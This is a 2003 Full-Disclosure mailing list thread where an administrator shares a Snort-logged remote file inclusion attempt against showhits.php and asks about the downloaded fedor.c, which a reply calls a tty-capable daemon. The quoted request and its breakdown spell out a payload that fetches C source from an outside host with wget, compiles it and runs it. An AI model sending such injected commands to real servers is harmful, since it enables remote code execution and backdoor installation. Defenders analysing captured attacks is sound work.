[<prev] [next>] [day] [month] [year] [list]
Message-ID: <houp3p.901yz8@vmail.lockedbox.net>
From: root at freebox.mine.nu (root)
Subject: Re: http://xfteam.net/fedor.c - Anyone seen this before??
I realised my foobar, just after I had posted.
A tty capable daemon. Interesting.. Surly "they" realise that apache runs as a
separate user on most systems(who runs it root?)
It was the only hit from that netblock so I guess that it was a scan.
And from looking at the google.jpg and the strings.txt i was lead to:
http://www.arplhmd.cjb.net/
Looks like he makes some scripts/tools, noting a google tool which could
account for the attempt on a dead link.
Regards,
Daniel.
"Rev. Kronovohr" <kronovohr@...alaeon.net> wrote:
> resolve www.xfteam.net first, and it'll go through
>
> Interesting attempt, BTW
>
> On Mon, 2003-11-24 at 03:28, Dan wrote:
> > Hi,
> > Our Snort picked up an interesting attempt to download, compile and
execute.
> > Noting also the fact that the sub dir its attempting to access has not
been
> > there for over 4 months(/logjam/)?
> >
> > Has anyone actually seen what this fedor.c is? I have done some google'ing
> but
> > it comes up blank.
> >
> > Has anyone else noticed this kindof request recently?
> >
> > Is it just me or is xfteam.net not resolving anyway?
> >
> > Orignal HTTP request:
> > GET /logjam/showhits.php?
> >
>
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
> >
> > Breaking this down we get(twice):
> > uname -a
> > cd /tmp
> > wget http://xfteam.net/fedor.c
> > gcc -o f fedor.c
> > ./f
> >
> >
> > Regards,
> > Daniel.
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists